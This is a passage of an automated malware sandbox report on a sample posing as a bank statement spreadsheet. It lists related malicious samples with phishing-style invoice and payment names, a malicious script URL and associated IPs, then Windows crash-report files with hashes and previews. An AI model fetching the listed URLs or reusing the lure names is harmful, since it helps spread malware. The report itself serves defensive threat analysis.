                                                                              http://iclickcdn.com/tag.min.js?ndn=m2Get hashmaliciousBrowse
                                                                              • 104.26.12.118
                                                                              NyUnwsFSCa.exeGet hashmaliciousBrowse
                                                                              • 162.159.133.233
                                                                              T-online.de.jar.zipGet hashmaliciousBrowse
                                                                              • 104.20.22.46
                                                                              Order specs19.11.20.exeGet hashmaliciousBrowse
                                                                              • 104.31.90.162
                                                                              Bank SWIFT Advice_pdf.exeGet hashmaliciousBrowse
                                                                              • 104.28.4.151
                                                                              Purchase_Order_11_19_20.exeGet hashmaliciousBrowse
                                                                              • 104.28.4.151
                                                                              https://signup.kwikvpn.com/Get hashmaliciousBrowse
                                                                              • 104.16.19.94
                                                                              u8u7GG8XMY.exeGet hashmaliciousBrowse
                                                                              • 66.235.200.147
                                                                              Uwmkxyajs0f2tlf.exeGet hashmaliciousBrowse
                                                                              • 172.67.153.188
                                                                              Purchase Order 40,7045.exeGet hashmaliciousBrowse
                                                                              • 172.67.199.180
                                                                              Proforma Invoice.xlsGet hashmaliciousBrowse
                                                                              • 104.22.1.232
                                                                              Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                                                              • 23.227.38.64
                                                                              Proforma Invoice.xlsGet hashmaliciousBrowse
                                                                              • 104.22.1.232

                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_bank-statment _x_319d48559b0a1af85a57a6082102ce05f64a1d9_00000000_15082965\Report.wer
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):18590
                                                                              Entropy (8bit):3.762256301757226
                                                                              Encrypted:false
                                                                              SSDEEP:192:W9XVjIi+VpjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7sxS274ItG:YVj6jB7vqsSt/u7sxX4ItG
                                                                              MD5:863ACDCCAAFF0865DC43E7C36A83310D
                                                                              SHA1:9546F6433676B37EB1402E9979C89BF7573691D5
                                                                              SHA-256:0837ABBBE40F4C0CF60097D061154C5D47120608DA89EE9826FC5180253A78F3
                                                                              SHA-512:215248AB9672B796C53105752B41E056B0910D94DBDEA7B9B60DFE892ACEE5C28F7FD853856421D6906A6A17D5FCAF5A01BDADE6B6DC49F7CFC9B3A49A0D19D7
                                                                              Malicious:false
                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.2.7.1.8.2.4.3.8.0.2.7.3.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.2.7.1.8.2.5.5.8.3.3.9.4.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.6.a.a.a.1.4.0.-.a.d.f.5.-.4.9.9.9.-.b.0.1.3.-.8.2.3.e.2.d.3.d.d.a.9.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.9.0.-.0.0.0.1.-.0.0.1.b.-.3.f.d.7.-.b.a.2.9.8.5.b.e.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.3.a.0.1.9.e.a.a.4.c.5.0.7.1.3.0.a.a.f.2.7.2.c.4.c.d.5.0.e.d.b.0.0.0.0.f.f.f.f.!.0.0.0.0.1.b.5.5.f.b.a.2.4.2.4.6.0.c.c.0.a.5.b.3.8.2.9.9.a.c.a.a.a.c.f.3.f.5.4.c.5.e.8.7.!.B.A.N.K.-.S.T.A.T.M.E.N.T. ._.x.l.s.x...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.1.1././.1.8.:.0.7.:.4.5.:.1.7.!.0.!.B.A.N.K.-.S.T.A.T.M.E.N.T. ._.x.l.s.x...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.t.A.s.
                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_bank-statment _x_319d48559b0a1af85a57a6082102ce05f64a1d9_00000000_1534c334\Report.wer
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):18586
                                                                              Entropy (8bit):3.7636886014541706
                                                                              Encrypted:false
                                                                              SSDEEP:192:miXVLIi+VpjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7sWS274ItC:TVL6jB7vqsSt/u7sWX4ItC
                                                                              MD5:17613DA2429AF011D8432AF3C01E7178
                                                                              SHA1:35453EC2DD80C1F47498A0A2E75519479F1148BF
                                                                              SHA-256:B3F9F48E54441A73FD61A902B1B65B6A1C0EFB53BB7FD9AEA4BB30F6BB67A8E9
                                                                              SHA-512:6DF5B2C387295EFAFB8F7482C66BEB3A3405875587464C880EC9AE37FD2BEBC7D867E8051EF0629ABAAF7B92A24151E0247705B13076B743F22952BDC9E63134
                                                                              Malicious:false
                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.2.7.1.8.6.3.8.6.4.5.2.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.2.7.1.8.6.5.0.6.7.6.3.9.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.a.2.f.b.8.a.c.-.8.e.f.d.-.4.9.1.f.-.a.8.4.7.-.b.5.4.4.6.9.f.5.2.6.b.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.2.4.-.0.0.0.1.-.0.0.1.b.-.3.b.b.9.-.e.f.4.0.8.5.b.e.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.3.a.0.1.9.e.a.a.4.c.5.0.7.1.3.0.a.a.f.2.7.2.c.4.c.d.5.0.e.d.b.0.0.0.0.f.f.f.f.!.0.0.0.0.1.b.5.5.f.b.a.2.4.2.4.6.0.c.c.0.a.5.b.3.8.2.9.9.a.c.a.a.a.c.f.3.f.5.4.c.5.e.8.7.!.B.A.N.K.-.S.T.A.T.M.E.N.T. ._.x.l.s.x...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.1.1././.1.8.:.0.7.:.4.5.:.1.7.!.0.!.B.A.N.K.-.S.T.A.T.M.E.N.T. ._.x.l.s.x...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.t.A.s.
                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_bank-statment _x_319d48559b0a1af85a57a6082102ce05f64a1d9_00000000_17308cf2\Report.wer
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):18590
                                                                              Entropy (8bit):3.7637503088136137
                                                                              Encrypted:false
                                                                              SSDEEP:192:7RyXVYIi+VpjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7sxS274Itv:sVY6jB7vqsSt/u7sxX4Itv
                                                                              MD5:9F4280CAC01546D61470D797E0431BCA
                                                                              SHA1:26EE8489F4611F285074202579D7820EDA7F537D
                                                                              SHA-256:FB04737A0C746098A4684211CF906B85B0EA6042672A84D5B565E1CFB0D78FD4
                                                                              SHA-512:76E38887B92EA678D3BC91AA63EB13CA350C8854966EDC2AB69B079E7DD8447D3CD8A7E82644538C30F0FBBC2F21C28CC2AA8CD0B22E9926FE61DCBF7C2780B8
                                                                              Malicious:false
                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.2.7.1.8.3.9.8.6.4.5.9.9.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.2.7.1.8.4.1.3.6.4.5.9.6.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.b.2.2.1.2.8.f.-.d.a.e.5.-.4.8.4.7.-.9.0.f.1.-.9.3.b.d.3.7.a.0.9.6.b.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.0.c.-.0.0.0.1.-.0.0.1.b.-.0.5.2.f.-.c.6.3.1.8.5.b.e.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.3.a.0.1.9.e.a.a.4.c.5.0.7.1.3.0.a.a.f.2.7.2.c.4.c.d.5.0.e.d.b.0.0.0.0.f.f.f.f.!.0.0.0.0.1.b.5.5.f.b.a.2.4.2.4.6.0.c.c.0.a.5.b.3.8.2.9.9.a.c.a.a.a.c.f.3.f.5.4.c.5.e.8.7.!.B.A.N.K.-.S.T.A.T.M.E.N.T. ._.x.l.s.x...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.1.1././.1.8.:.0.7.:.4.5.:.1.7.!.0.!.B.A.N.K.-.S.T.A.T.M.E.N.T. ._.x.l.s.x...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.t.A.s.
                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_bank-statment _x_319d48559b0a1af85a57a6082102ce05f64a1d9_00000000_1aa0f8cb\Report.wer
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):18592
                                                                              Entropy (8bit):3.763786373480976
                                                                              Encrypted:false
                                                                              SSDEEP:192:RZ0XV0Ii+VpjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7sWS274Iti:fUV06jB7vqsSt/u7sWX4Iti
                                                                              MD5:E47DA98DC5C443208459D81E83BDDAAB
                                                                              SHA1:52BE95EFA7CB50221CC8A83CC3AE88EE921C8157
                                                                              SHA-256:C60A32D4ADB7E38554AC91D789EEBDDA54C28A592DC1B16C4C56857AA2B8EFBF
                                                                              SHA-512:A064D319F76DA111ADA6076FA53A1784C566FBFD72149C596E865F0A554660AD762C28C5EB09A132F1002040255CD2164A51FBD3F64944CDA7DB0C60FAF4B744
                                                                              Malicious:false
                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.2.7.1.8.7.7.5.8.3.2.2.5.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.2.7.1.8.7.8.7.2.3.8.5.7.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.8.1.2.a.2.d.3.-.c.c.c.1.-.4.4.1.2.-.a.8.1.9.-.c.7.3.b.f.c.e.3.4.5.6.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.c.c.-.0.0.0.1.-.0.0.1.b.-.4.8.8.7.-.5.d.4.8.8.5.b.e.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.3.a.0.1.9.e.a.a.4.c.5.0.7.1.3.0.a.a.f.2.7.2.c.4.c.d.5.0.e.d.b.0.0.0.0.f.f.f.f.!.0.0.0.0.1.b.5.5.f.b.a.2.4.2.4.6.0.c.c.0.a.5.b.3.8.2.9.9.a.c.a.a.a.c.f.3.f.5.4.c.5.e.8.7.!.B.A.N.K.-.S.T.A.T.M.E.N.T. ._.x.l.s.x...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.1.1././.1.8.:.0.7.:.4.5.:.1.7.!.0.!.B.A.N.K.-.S.T.A.T.M.E.N.T. ._.x.l.s.x...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.t.A.s.
                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bank-statment _x_319d48559b0a1af85a57a6082102ce05f64a1d9_00000000_173bee50\Report.wer
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):18230
                                                                              Entropy (8bit):3.7611081288567427
                                                                              Encrypted:false
                                                                              SSDEEP:192:fZXVGFi+VpjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xTc/u7sxS274ItD:hVGjjB7vqsSI/u7sxX4ItD
                                                                              MD5:1D6B9C7D1BCA6E5B897721E501AE55F7
                                                                              SHA1:55125A143ECECA70B183A7A30C0312EA4C49EC03
                                                                              SHA-256:7EAFC56A884B493D22E34ED069F111AC40EBB40CD69B7AFACEEDB2A0916EAC06
                                                                              SHA-512:D731A058666AE6E4D559017A4F058183D7C630DB12D0E0A6C2BB773CF45391F246517A7942B8DFA61E1307B007573D8F906220A6B0ACD391099ACBD4C8256801
                                                                              Malicious:false
                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.2.7.1.7.7.6.4.5.8.5.5.7.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.2.7.1.7.7.8.0.5.2.2.9.9.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.9.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.d.a.f.b.7.c.6.-.e.e.c.e.-.4.3.1.b.-.b.9.2.f.-.9.d.9.c.b.f.a.4.7.b.e.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.9.4.-.0.0.0.1.-.0.0.1.b.-.4.0.5.c.-.7.9.0.8.8.5.b.e.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.3.a.0.1.9.e.a.a.4.c.5.0.7.1.3.0.a.a.f.2.7.2.c.4.c.d.5.0.e.d.b.0.0.0.0.f.f.f.f.!.0.0.0.0.1.b.5.5.f.b.a.2.4.2.4.6.0.c.c.0.a.5.b.3.8.2.9.9.a.c.a.a.a.c.f.3.f.5.4.c.5.e.8.7.!.B.A.N.K.-.S.T.A.T.M.E.N.T. ._.x.l.s.x...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.1.1././.1.8.:.0.7.:.4.5.:.1.7.!.0.!.B.A.N.K.-.S.T.A.T.M.E.N.T. ._.x.l.s.x...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.t.A.s.I.d.=.3.6.3...
                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER2128.tmp.WERInternalMetadata.xml
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):5692
                                                                              Entropy (8bit):3.7319624624525853
                                                                              Encrypted:false
                                                                              SSDEEP:96:RtIU6o7r3GLt3iwZ66l8YZHuvUubSfOyWggwB+aM1lR1f04Oh6QGm:Rrl7r3GLNiwZ66WYZHuvUubS/+p1lR1W
                                                                              MD5:8552D2001589AA8518032CD3C584137A
                                                                              SHA1:BA2152F9BE4134A2FCE139BC9080A49223A7A717
                                                                              SHA-256:52CBB08329A85E99C93B3453D36E529D827643F1E5485D57C7C6ABB9A2CF0A65
                                                                              SHA-512:FCC3C0DC2DD96F41D1C2B51A73895D23E0683F5E22F85191870F6F33A3F81C16D276395DE87C9EFC86EE7EC9993A83E35F32580D8794CFFF02EF7C7D5E492DD4
                                                                              Malicious:false
                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.4.0.<./.P.i.d.>.......
                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER21C5.tmp.xml
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4657
                                                                              Entropy (8bit):4.47363119991153
                                                                              Encrypted:false
                                                                              SSDEEP:48:cvIwSD8zsMJgtWI9sqWSC8BY8fm8M4JFKA7FH+q8v9Ecv4Hqd:uITfKfLSN/JFKKKucvgqd
                                                                              MD5:0498ADAFD3AB8965B176B440425C0A7A
                                                                              SHA1:432D1586917BF8560D4E8192A0E077908206327F
                                                                              SHA-256:BDF1D7678F110EFE8C14134A8D46B0D43974D4EA421F44DFFAEB9C687EAA548C
                                                                              SHA-512:07E3C1827F9157B3A4916445D5ED8A1498532F94CF85FC43D2207213BB99ED2E4BA44BECDDE7B0C2E000E27E409ED6E5C84D8509BE6976DBE68D6C5C43DFA732
                                                                              Malicious:false
                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="735854" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER5DA4.tmp.WERInternalMetadata.xml
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):7706
                                                                              Entropy (8bit):3.7093624418460873
                                                                              Encrypted:false
                                                                              SSDEEP:192:Rrl7r3GLNiyK6h4aOv6YD668gmfZHuvUubS/+p1SY1f9PGm:RrlsNif6a6Ye68gmfgvvbS6SCfd
                                                                              MD5:13FBDD30D51AB2E61A1A0C2BB9CBAD22
                                                                              SHA1:272F7E82FACE89A45E212A5EDC0F5565AE11173F
                                                                              SHA-256:A925E98DEE3B85593CD16C62CF16AB0FA1BD7BF09424610A0AAC65166408F4B1
                                                                              SHA-512:67518F59765484D7EF9D280D95CD2DCEF9A74BCDE6249B441B93930063185CADCE874D8B9E01BFC829FE87667D547913CDF0C08115A0374BB8F9FB0ABC7E53C8
                                                                              Malicious:false
                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.4.8.<./.P.i.d.>.......
                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E9F.tmp.xml
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4657
                                                                              Entropy (8bit):4.476145816240227
                                                                              Encrypted:false
                                                                              SSDEEP:48:cvIwSD8zsMJgtWI9sqWSC8B78fm8M4JFKA7FRz+q8v9jcv4Hzd:uITfKfLSNCJFKUzKVcvgzd
                                                                              MD5:9D066B7E9C821DD3E2968B9327FFC583
                                                                              SHA1:E91C21354D81A329C86162F31B4484397FD48B5B
                                                                              SHA-256:0B15A5BB24EB7D299148838CE4185DB9E47322DA48250D399B4196D8F25DD9EC
                                                                              SHA-512:257C0134D7415CE5FA8AFDD8AE1564C8AFEC4DFEB694E35304F5AC38CE40AEBB4CD747EBE7E80FE7C1F13B78EC5B2B5849F2ABD673416C40EEFA9ABBD6BD2FD7
                                                                              Malicious:false
                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="735854" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER65F6.tmp.WERInternalMetadata.xml
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):7664
                                                                              Entropy (8bit):3.7013706190950346
                                                                              Encrypted:false
                                                                              SSDEEP:192:Rrl7r3GLNijr6PT6Ygr6QgmfZHuvUubS/+p1XX1fw9m:RrlsNiP676YU6QgmfgvvbS6XlfH
                                                                              MD5:670D94A4E814A0E3DA13F43F224F812E
                                                                              SHA1:4DF1A1C5AA3C09BCB38AE5F54A01A591B6331B50
                                                                              SHA-256:1DAC09070F73B6B270783D2F400482A35E7DA0DD394BCB880064B7A1132552A2
                                                                              SHA-512:9F8B8C5771CB0BC7554DE8804172EFB796619B948E1C81BD1C45DC919E1FF8D23F43C67C8FFA8F2C37BCB310DDFB6D1F9F8ACE5287CF89C9D2EE9C6FA5A08AA2
                                                                              Malicious:false
                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.5.0.0.<./.P.i.d.>.......
                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER66C2.tmp.xml
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4657
                                                                              Entropy (8bit):4.476517921665472
                                                                              Encrypted:false
                                                                              SSDEEP:48:cvIwSD8zs5JgtWI9sqWSC8Bu8fm8M4JFKA7FW+q8v9ncv4HBd:uITfLfLSNNJFKTKtcvgBd
                                                                              MD5:D73E09E3709B8D13B9C98DCD2411FEA7
                                                                              SHA1:76A6F85365798CA0986552BCE6C4E737ECE35A6E
                                                                              SHA-256:55715E63CB2EF0E28F697DD1F5A72E8F87EBCC0FA14EF90EEC49EF6132A0BC01
                                                                              SHA-512:D4F3F73F6320AF8CDEF6F1A840F349E7263136841ABFA69F9A3AF94A96FAEB04295564FB6D0CD46B70F294DE9F032AE76F1849C9A96FC0F265D912F8C930718F
                                                                              Malicious:false
